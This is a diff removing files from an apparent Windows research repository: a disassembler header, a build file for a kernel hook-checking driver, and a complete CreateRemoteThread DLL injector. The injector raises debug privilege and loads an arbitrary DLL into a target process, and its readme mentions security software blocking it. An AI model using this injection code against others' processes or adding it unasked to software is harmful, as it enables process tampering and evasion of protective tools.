int length; // Instruction length
enum Instruction type; // Instruction type
enum Mode mode; // Addressing mode
BYTE opcode; // Actual opcode
BYTE modrm; // MODRM byte
BYTE sib; // SIB byte
int extindex; // Extension table index
int fpuindex; // FPU table index
int dispbytes; // Displacement bytes (0 = no displacement)
int immbytes; // Immediate bytes (0 = no immediate)
int sectionbytes; // Section prefix bytes (0 = no section prefix)
OPERAND op1; // First operand (if any)
OPERAND op2; // Second operand (if any)
OPERAND op3; // Additional operand (if any)
PINST ptr; // Pointer to instruction table
int flags; // Instruction flags
} INSTRUCTION, *PINSTRUCTION;
// Function definitions
int get_instruction(
INSTRUCTION *inst, // pointer to INSTRUCTION structure
BYTE *addr, // code buffer
enum Mode mode // mode: MODE_32 or MODE_16
);
// Get complete instruction string
int get_instruction_string(
INSTRUCTION *inst, // pointer to INSTRUCTION structure
enum Format format, // instruction format: FORMAT_ATT or FORMAT_INTEL
DWORD offset, // instruction absolute address
char *string, // string buffer
int length // string length
);
// Get mnemonic string
int get_mnemonic_string(
INSTRUCTION *inst, // pointer to INSTRUCTION structure
enum Format format, // instruction format: FORMAT_ATT or FORMAT_INTEL
char *string, // string buffer
int length // string length
);
// Get individual operand string
int get_operand_string(
INSTRUCTION *inst, // pointer to INSTRUCTION structure
POPERAND op, // pointer to OPERAND structure
enum Format format, // instruction format: FORMAT_ATT or FORMAT_INTEL
DWORD offset, // instruction absolute address
char *string, // string buffer
int length // string length
);
// Helper functions
int get_register_type(
POPERAND op
);
int get_operand_type(
POPERAND op
);
int get_operand_register(
POPERAND op
);
int get_operand_basereg(
POPERAND op
);
int get_operand_indexreg(
POPERAND op
);
int get_operand_scale(
POPERAND op
);
int get_operand_immediate(
POPERAND op,
DWORD *imm // returned immediate value
);
int get_operand_displacement(
POPERAND op,
DWORD *disp // returned displacement value
);
POPERAND get_source_operand(
PINSTRUCTION inst
);
POPERAND get_destination_operand(
PINSTRUCTION inst
);
// Instruction prefix groups
// Group 1
#define MASK_PREFIX_G1(x) ((x) & 0xFF000000) >> 24
#define PREFIX_LOCK 0x01000000 // 0xf0
#define PREFIX_REPNE 0x02000000 // 0xf2
#define PREFIX_REP 0x03000000 // 0xf3
#define PREFIX_REPE 0x03000000 // 0xf3
// Group 2
#define MASK_PREFIX_G2(x) ((x) & 0x00FF0000) >> 16
#define PREFIX_ES_OVERRIDE 0x00010000 // 0x26
#define PREFIX_CS_OVERRIDE 0x00020000 // 0x2e
#define PREFIX_SS_OVERRIDE 0x00030000 // 0x36
#define PREFIX_DS_OVERRIDE 0x00040000 // 0x3e
#define PREFIX_FS_OVERRIDE 0x00050000 // 0x64
#define PREFIX_GS_OVERRIDE 0x00060000 // 0x65
// Group 3 & 4
#define MASK_PREFIX_G3(x) ((x) & 0x0000FF00) >> 8
#define MASK_PREFIX_OPERAND(x) ((x) & 0x00000F00) >> 8
#define MASK_PREFIX_ADDR(x) ((x) & 0x0000F000) >> 12
#define PREFIX_OPERAND_SIZE_OVERRIDE 0x00000100 // 0x66
#define PREFIX_ADDR_SIZE_OVERRIDE 0x00001000 // 0x67
// Extensions
#define MASK_EXT(x) ((x) & 0x000000FF)
#define EXT_G1 0x00000001
#define EXT_G2 0x00000002
#define EXT_G3 0x00000003
#define EXT_G4 0x00000004
#define EXT_G5 0x00000005
#define EXT_G6 0x00000006
#define EXT_G7 0x00000007
#define EXT_G8 0x00000008
#define EXT_G9 0x00000009
#define EXT_GA 0x0000000a
#define EXT_GB 0x0000000b
#define EXT_GC 0x0000000c
#define EXT_GD 0x0000000d
#define EXT_GE 0x0000000e
#define EXT_GF 0x0000000f
#define EXT_G0 0x00000010
// Extra groups for 2 and 3-byte opcodes, and FPU stuff
#define EXT_T2 0x00000020 // opcode table 2
#define EXT_CP 0x00000030 // co-processor
// Operand flags
#define FLAGS_NONE 0
// Operand Addressing Methods, from the Intel manual
#define MASK_AM(x) ((x) & 0x00FF0000)
#define AM_A 0x00010000 // Direct address with segment prefix
#define AM_C 0x00020000 // MODRM reg field defines control register
#define AM_D 0x00030000 // MODRM reg field defines debug register
#define AM_E 0x00040000 // MODRM byte defines reg/memory address
#define AM_G 0x00050000 // MODRM byte defines general-purpose reg
#define AM_I 0x00060000 // Immediate data follows
#define AM_J 0x00070000 // Immediate value is relative to EIP
#define AM_M 0x00080000 // MODRM mod field can refer only to memory
#define AM_O 0x00090000 // Displacement follows (without modrm/sib)
#define AM_P 0x000a0000 // MODRM reg field defines MMX register
#define AM_Q 0x000b0000 // MODRM defines MMX register or memory
#define AM_R 0x000c0000 // MODRM mod field can only refer to register
#define AM_S 0x000d0000 // MODRM reg field defines segment register
#define AM_T 0x000e0000 // MODRM reg field defines test register
#define AM_V 0x000f0000 // MODRM reg field defines XMM register
#define AM_W 0x00100000 // MODRM defines XMM register or memory
// Extra addressing modes used in this implementation
#define AM_I1 0x00200000 // Immediate byte 1 encoded in instruction
#define AM_REG 0x00210000 // Register encoded in instruction
// Operand Types, from the intel manual
#define MASK_OT(x) ((x) & 0xFF000000)
#define OT_a 0x01000000
#define OT_b 0x02000000 // always 1 byte
#define OT_c 0x03000000 // byte or word, depending on operand
#define OT_d 0x04000000 // double-word
#define OT_q 0x05000000 // quad-word
#define OT_dq 0x06000000 // double quad-word
#define OT_v 0x07000000 // word or double-word, depending on operand
#define OT_w 0x08000000 // always word
#define OT_p 0x09000000 // 32-bit or 48-bit pointer
#define OT_pi 0x0a000000 // quadword MMX register
#define OT_pd 0x0b000000 // 128-bit double-precision float
#define OT_ps 0x0c000000 // 128-bit single-precision float
#define OT_s 0x0d000000 // 6-byte pseudo descriptor
#define OT_sd 0x0e000000 // Scalar of 128-bit double-precision float
#define OT_ss 0x0f000000 // Scalar of 128-bit single-precision float
#define OT_si 0x10000000 // Doubleword integer register
#define OT_t 0x11000000 // 80-bit packed FP data
// Additional operand flags
#define MASK_FLAGS(x) ((x) & 0x0000FF00)
#define F_s 0x00000100 // sign-extend 1-byte immediate
#define F_r 0x00000200 // use segment register
#define F_f 0x00000300 // use FPU register
// MODRM byte
#define MASK_MODRM_MOD(x) (((x) & 0xc0) >> 6)
#define MASK_MODRM_REG(x) (((x) & 0x38) >> 3)
#define MASK_MODRM_RM(x) ((x) & 0x7)
// SIB byte
#define MASK_SIB_SCALE(x) MASK_MODRM_MOD(x)
#define MASK_SIB_INDEX(x) MASK_MODRM_REG(x)
#define MASK_SIB_BASE(x) MASK_MODRM_RM(x)
#ifdef __cplusplus
}
#endif
#endif


@ -1,18 +0,0 @@
TARGETNAME=CheckKernelHook
#TARGETPATH=$(BASEDIR)\lib
TARGETPATH=obj
TARGETTYPE=DRIVER
INCLUDES=.\
SOURCES= \
DriverEntry.c \
Common.c \
KernelHookCheck.c \
Reload.c \
FileSystem.c \
FixRelocation.c \
KernelReload.c \
libdasm.c


@ -1,3 +0,0 @@
1.Reload the first kernel module
2.check EAT function (Zwxx)
3.check InlineHook (not Zwxx)


@ -1,26 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CreateRemoteThread", "CreateRemoteThread\CreateRemoteThread.vcxproj", "{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Debug|Win32.ActiveCfg = Debug|Win32
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Debug|Win32.Build.0 = Debug|Win32
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Debug|x64.ActiveCfg = Debug|x64
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Debug|x64.Build.0 = Debug|x64
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Release|Win32.ActiveCfg = Release|Win32
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Release|Win32.Build.0 = Release|Win32
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Release|x64.ActiveCfg = Release|x64
{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -1,337 +0,0 @@
/*
x86和x64的注入因为x64的系统增加了较多的权限的校验
x64提权主要就是用到了ntdll.dll中的未导出函数RtlAdjustPrivilege().
*/
#include "stdafx.h"
#include "CreateRemoteThread.h"
#include <strsafe.h>
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// 唯一的应用程序对象
CWinApp theApp;
using namespace std;
typedef enum _WIN_VERSION
{
WindowsNT,
Windows2000,
WindowsXP,
Windows2003,
WindowsVista,
Windows7,
Windows8,
Windows10,
WinUnknown
}WIN_VERSION;
typedef NTSTATUS( NTAPI* fnRtlGetVersion )(PRTL_OSVERSIONINFOW lpVersionInformation);
VOID InjectDll(ULONG_PTR ProcessID, WCHAR* strPath);
WIN_VERSION GetWindowsVersion();
BOOL EnableDebugPrivilege();
BOOL InjectDllByRemoteThreadXP(const TCHAR* wzDllFile, ULONG_PTR ProcessId);
BOOL InjectDllByRemoteThreadWin7(const TCHAR* wzDllFile, ULONG_PTR ProcessId);
typedef long (__fastcall *pfnRtlAdjustPrivilege64)(ULONG,ULONG,ULONG,PVOID);
typedef long (__stdcall *pfnRtlAdjustPrivilege32)(ULONG,ULONG,ULONG,PVOID);
WIN_VERSION WinVersion = WinUnknown;
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
WinVersion = GetWindowsVersion();
if(argc == 3)
{
ULONG ProcessId = 0;
swscanf_s(argv[1], L"%d", &ProcessId);
InjectDll(ProcessId, argv[2]);
}
return 0;
}
VOID InjectDll(ULONG_PTR ProcessID, WCHAR* strPath)
{
WCHAR wzPath[MAX_PATH] = {0};
if (ProcessID == 0 || strPath == NULL)
{
printf("Inject Fail ProcessId or strPath is not exists \r\n");
return;
}
GetCurrentDirectory(260,wzPath);
wcsncat_s(wzPath, L"\\", 2);
wcsncat_s(wzPath, strPath, wcslen(strPath));//dll完整路径
if (!PathFileExists(wzPath))
{
printf("Inject Fail strPath is not exists LastError [%d]\r\n", GetLastError());
return;
}
printf("Inject Target [%d], strPath [%S]\n", ProcessID, wzPath);
if(WinVersion >= Windows7)
{
if (!InjectDllByRemoteThreadWin7(wzPath,ProcessID))
printf("Inject Fail\r\n");
else
printf ("Inject Success\r\n");
}
else
{
if (!InjectDllByRemoteThreadXP(wzPath,ProcessID))
printf("Inject Fail\r\n");
else
printf("Inject Success\r\n");
}
}
BOOL InjectDllByRemoteThreadWin7(const TCHAR* wzDllFile, ULONG_PTR ProcessId)
{
if (NULL == wzDllFile || 0 == ::_tcslen(wzDllFile) || ProcessId == 0 || -1 == _taccess(wzDllFile, 0))
{
return FALSE;
}
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
DWORD dwRetVal = 0;
LPTHREAD_START_ROUTINE FuncAddress = NULL;
DWORD dwSize = 0;
TCHAR* VirtualAddress = NULL;
//预编译支持Unicode
#ifdef _UNICODE
FuncAddress = (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("Kernel32")), "LoadLibraryW");
#else
FuncAddress = (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("Kernel32")), "LoadLibraryA");
#endif
if (FuncAddress==NULL)
{
return FALSE;
}
#ifdef _WIN64
pfnRtlAdjustPrivilege64 RtlAdjustPrivilege = NULL;
RtlAdjustPrivilege=(pfnRtlAdjustPrivilege64)GetProcAddress((HMODULE)(FuncAddress(L"ntdll.dll")),"RtlAdjustPrivilege");
#else
pfnRtlAdjustPrivilege32 RtlAdjustPrivilege = NULL;
RtlAdjustPrivilege=(pfnRtlAdjustPrivilege32)GetProcAddress((HMODULE)(FuncAddress(L"ntdll.dll")),"RtlAdjustPrivilege");
#endif
if (RtlAdjustPrivilege==NULL)
{
return FALSE;
}
/*
. SE_BACKUP_PRIVILEGE, "17",
. SE_RESTORE_PRIVILEGE, "18",
. SE_SHUTDOWN_PRIVILEGE, "19",
. SE_DEBUG_PRIVILEGE, "20",
*/
RtlAdjustPrivilege(20,1,0,&dwRetVal); //19
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE, ProcessId);
if (NULL == hProcess)
{
printf("Open Process Fail lastError [%d]\r\n", GetLastError());
return FALSE;
}
// 在目标进程中分配内存空间
dwSize = (DWORD)::_tcslen(wzDllFile) + 1;
VirtualAddress = (TCHAR*)::VirtualAllocEx(hProcess, NULL, dwSize * sizeof(TCHAR), MEM_COMMIT, PAGE_READWRITE);
if (NULL == VirtualAddress)
{
printf("Virtual Process Memory Fail lastError [%d]\r\n", GetLastError());
CloseHandle(hProcess);
return FALSE;
}
// 在目标进程的内存空间中写入所需参数(模块名)
if (FALSE == ::WriteProcessMemory(hProcess, VirtualAddress, (LPVOID)wzDllFile, dwSize * sizeof(TCHAR), NULL))
{
printf("Write Data Fail LastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return FALSE;
}
hThread = ::CreateRemoteThread(hProcess, NULL, 0, FuncAddress, VirtualAddress, 0, NULL);
if (NULL == hThread)
{
printf("CreateRemoteThread Fail lastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return FALSE;
}
// 等待远程线程结束
WaitForSingleObject(hThread, INFINITE);
// 清理资源
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
BOOL InjectDllByRemoteThreadXP(const TCHAR* wzDllFile, ULONG_PTR ProcessId)
{
// 参数无效
if (NULL == wzDllFile || 0 == ::_tcslen(wzDllFile) || ProcessId == 0 || -1 == _taccess(wzDllFile, 0))
{
return FALSE;
}
HANDLE hProcess = NULL;
HANDLE hThread = NULL;
DWORD dwSize = 0;
TCHAR* VirtualAddress = NULL;
LPTHREAD_START_ROUTINE FuncAddress = NULL;
if(!EnableDebugPrivilege())
{
printf("EnableDebugPrivilege fail lasterror is [%d]\n", GetLastError());
return FALSE;
}
// 获取目标进程句柄
hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, ProcessId);
if (NULL == hProcess)
{
printf("Open Process Fail LastError [%d]\r\n", GetLastError());
return FALSE;
}
// 在目标进程中分配内存空间
dwSize = (DWORD)::_tcslen(wzDllFile) + 1;
VirtualAddress = (TCHAR*)::VirtualAllocEx(hProcess, NULL, dwSize * sizeof(TCHAR), MEM_COMMIT, PAGE_READWRITE);
if (NULL == VirtualAddress)
{
printf("Virtual Process Memory Fail LastError [%d]\r\n", GetLastError());
CloseHandle(hProcess);
return FALSE;
}
// 在目标进程的内存空间中写入所需参数(模块名)
if (FALSE == ::WriteProcessMemory(hProcess, VirtualAddress, (LPVOID)wzDllFile, dwSize * sizeof(TCHAR), NULL))
{
printf("Write Data Fail LastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return FALSE;
}
// 从 Kernel32.dll 中获取 LoadLibrary 函数地址
#ifdef _UNICODE
FuncAddress = (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("Kernel32")), "LoadLibraryW");
#else
FuncAddress = (PTHREAD_START_ROUTINE)::GetProcAddress(::GetModuleHandle(_T("Kernel32")), "LoadLibraryA");
#endif
if (NULL == FuncAddress)
{
printf("Get LoadLibrary Fail LastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return false;
}
// 创建远程线程调用 LoadLibrary
hThread = ::CreateRemoteThread(hProcess, NULL, 0, FuncAddress, VirtualAddress, 0, NULL);
if (NULL == hThread)
{
printf("CreateRemoteThread Fail LastError [%d]\r\n", GetLastError());
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hProcess);
return FALSE;
}
// 等待远程线程结束
WaitForSingleObject(hThread, INFINITE);
// 清理
VirtualFreeEx(hProcess, VirtualAddress, dwSize, MEM_DECOMMIT);
CloseHandle(hThread);
CloseHandle(hProcess);
return TRUE;
}
WIN_VERSION GetWindowsVersion()
{
RTL_OSVERSIONINFOEXW verInfo = { 0 };
verInfo.dwOSVersionInfoSize = sizeof( verInfo );
fnRtlGetVersion RtlGetVersion = (fnRtlGetVersion)GetProcAddress( GetModuleHandleW( L"ntdll.dll" ), "RtlGetVersion" );
if(RtlGetVersion != NULL && RtlGetVersion((PRTL_OSVERSIONINFOW)&verInfo) == 0)
{
if (verInfo.dwMajorVersion <= 4 )
{
return WindowsNT;
}
if (verInfo.dwMajorVersion == 5 && verInfo.dwMinorVersion == 0)
{
return Windows2000;
}
if (verInfo.dwMajorVersion == 5 && verInfo.dwMinorVersion == 1)
{
return WindowsXP;
}
if (verInfo.dwMajorVersion == 5 && verInfo.dwMinorVersion == 2)
{
return Windows2003;
}
if (verInfo.dwMajorVersion == 6 && verInfo.dwMinorVersion == 0)
{
return WindowsVista;
}
if (verInfo.dwMajorVersion == 6 && verInfo.dwMinorVersion == 1)
{
return Windows7;
}
if (verInfo.dwMajorVersion == 6 && verInfo.dwMinorVersion == 2 )
{
return Windows8;
}
if (verInfo.dwMajorVersion == 10 && verInfo.dwMinorVersion == 0 && verInfo.dwBuildNumber >= 10240)
{
return Windows10;
}
}
return WinUnknown;
}
BOOL EnableDebugPrivilege()
{
HANDLE hToken;
TOKEN_PRIVILEGES TokenPrivilege;
LUID uID;
if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
{
printf("OpenProcessToken is Error\n");
return FALSE;
}
if (!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&uID))
{
printf("LookupPrivilegeValue is Error\n");
return FALSE;
}
TokenPrivilege.PrivilegeCount = 1;
TokenPrivilege.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
TokenPrivilege.Privileges[0].Luid = uID;
//在这里我们进行调整权限
if (!AdjustTokenPrivileges(hToken,false,&TokenPrivilege,sizeof(TOKEN_PRIVILEGES),NULL,NULL))
{
printf("AdjuestTokenPrivileges is Error\n");
return FALSE;
}
return TRUE;
}


@ -1,3 +0,0 @@
#pragma once
#include "resource.h"


@ -1,161 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{62BBF757-A1B4-4FF4-89C0-2890DEF4983F}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CreateRemoteThread</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="CreateRemoteThread.h" />
<ClInclude Include="Resource.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="CreateRemoteThread.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CreateRemoteThread.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -1,47 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="CreateRemoteThread.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="CreateRemoteThread.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="CreateRemoteThread.rc">
<Filter>资源文件</Filter>
</ResourceCompile>
</ItemGroup>
</Project>


@ -1,4 +0,0 @@
32 bit process Inject The dll to 32 bit process
64 bit process Inject The dll to 64 bit process
sometimes you maybe fail to inject because cann't openprocess successful
and many safe software will protect it avoiding you to inject


@ -1,17 +0,0 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by CreateRemoteThread.rc
//
#define IDS_APP_TITLE 103
// 新对象的下一组默认值
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif


@ -1,8 +0,0 @@
// stdafx.cpp : 只包括标准包含文件的源文件
// CreateRemoteThread.pch 将作为预编译头
// stdafx.obj 将包含预编译类型信息
#include "stdafx.h"
// TODO: 在 STDAFX.H 中
// 引用任何所需的附加头文件,而不是在此文件中引用


@ -1,32 +0,0 @@
// stdafx.h : 标准系统包含文件的包含文件,
// 或是经常使用但不常更改的
// 特定于项目的包含文件
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // 某些 CString 构造函数将是显式的
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 从 Windows 头文件中排除极少使用的信息
#endif
#include <afx.h>
#include <afxwin.h> // MFC 核心组件和标准组件
#include <afxext.h> // MFC 扩展
#ifndef _AFX_NO_OLE_SUPPORT
#include <afxdtctl.h> // MFC 对 Internet Explorer 4 公共控件的支持
#endif
